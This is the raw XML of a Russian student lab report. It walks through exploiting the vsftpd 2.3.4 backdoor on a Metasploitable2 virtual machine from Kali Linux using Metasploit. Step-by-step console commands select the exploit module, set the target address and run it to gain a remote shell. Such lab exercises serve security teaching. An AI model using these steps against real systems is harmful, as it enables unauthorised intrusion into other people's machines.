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360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Ордена трудового красного знамени федеральное бюджетное общеобразовательное учреждение  высшего образования “Московский технический университет связи и информатики”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Факультет кибернетики и информационной безопасности</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Отчёт по практической работе №11</w:t>
      </w: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right"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Выполнил студент группы ЗРС2202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>Ершов Михаил Максимович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 xml:space="preserve">Преподаватель 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>Кудряшов Всеволод Владимирович</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Москва 2022</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Скачиваем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">inux. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Для начала устанавливаем </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">metasploitable2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">на виртуальную машину. Нужно указать 256Мб, а также указать, что используем существующий виртуальный диск. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее устанавливаем в параметрах сеть виртуальный адаптер  исключительно для хоста. То же самое повторяем с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда всё готово </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">запускаем виртуальные машины. В машине </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">запускаем </w:t>
      </w:r>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>service postgresql start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$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>service metasploit start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$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  4) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>виртуальной машине</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  metasploitable2 смотрим  ip-адрес</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  5) Далее начинаем поиск уязвимость </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsftpd.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$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>6) Теперь нам нужно выбрать эксплойт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$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>7) проверяем настройки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">8) используем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">адрес для атаки на первую жертву.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$ </w:t>
      </w:r>
      <w:r>
        <w:t>set RHOST 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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9) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>приступаем к запуску атаки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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10) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате атаки мы получаем доступ к командной строке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:hint="default"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:caps w:val="off"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="ffffff"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w: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/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:sectPr>
      <w:pgMar w:top="454" w:bottom="0" w:left="11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57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29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01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73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45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17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489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61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330" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:multiLevelType w:val="singleLevel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40" w:lineRule="auto"/>
        <w:ind w:left="-432" w:right="-324" w:firstLine="85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Ершов Михаил</cp:lastModifiedBy>
</cp:coreProperties>
</file>